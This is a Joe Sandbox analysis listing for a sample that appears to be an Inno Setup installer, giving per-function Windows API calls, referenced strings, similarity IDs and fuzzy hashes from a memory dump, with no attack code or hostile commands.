Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: File$Attributes$Move
String ID: $pI$isRS-%.3u.tmp
API String ID: 3839737484-4128586672
Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59

Function 0042E91C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D

Strings

user32.dll, xrefs: 0042E949
ShutdownBlockReasonCreate, xrefs: 0042E944

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressByteCharHandleModuleMultiProcWide
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 828529508-2866557904
Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F

Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

Up, xrefs: 00401A04

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: Up
API String ID: 730355536-1945652401
Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF

Function 004534B2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

$pI, xrefs: 00453594
DeleteFile, xrefs: 004534D0
MoveFile, xrefs: 004534ED

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: $pI$DeleteFile$MoveFile
API String ID: 3024442154-1403374609
Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929

Function 0042E820 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D

Strings

ChangeWindowMessageFilter, xrefs: 0042E82C
user32.dll, xrefs: 0042E831

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F

Function 0047663C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00476644
GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D

Strings

user32.dll, xrefs: 00476652
AllowSetForegroundWindow, xrefs: 0047664D

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C

Function 0044EF98 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9

Strings

user32.dll, xrefs: 0044EFCE
dD, xrefs: 0044EFAB
NotifyWinEvent, xrefs: 0044EFC9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NotifyWinEvent$dD$user32.dll
API String ID: 1646373207-754903266
Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F

Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00416C62
SaveDC.GDI32(?), ref: 00416C93
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
RestoreDC.GDI32(?,?), ref: 00416D1B
EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58

Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 00414846
MulDiv.KERNEL32(?,?,?), ref: 00414860
MulDiv.KERNEL32(?,?,?), ref: 00414889
MulDiv.KERNEL32(?,?,?), ref: 004148B4
MulDiv.KERNEL32(00000000,?,00000000), ref: 004148FC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19

Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C

Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
73E9A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
DeleteObject.GDI32(00000000), ref: 0041BCAA

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MetricsSystem$A570A6310DeleteObject
String ID:
API String ID: 3435189566-0
Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98

Function 0047255C Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7

GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF

Strings

Setting permissions on registry key: %s\%s, xrefs: 004725AE
Failed to set permissions on registry key (%d)., xrefs: 00472610
Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
API String ID: 1452528299-4018462623
Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9

Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D

Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

73E98830.GDI32(00000000,00000000,00000000), ref: 00414429
73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: E922E98830$A480
String ID:
API String ID: 3692852386-0
Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765

Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON

Download Yara Rule

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD

Strings

Z, xrefs: 00407044

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A

Function 0044C814 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0044C8A2
DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955

Strings

, xrefs: 0044C887

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64

Function 0042EDE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(?,00000000), ref: 0042EE35
73E9A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14

Strings

...\, xrefs: 0042EEC6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: A480A570CreateFontIndirectObjectSelect
String ID: ...\
API String ID: 2998766281-983595016
Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69

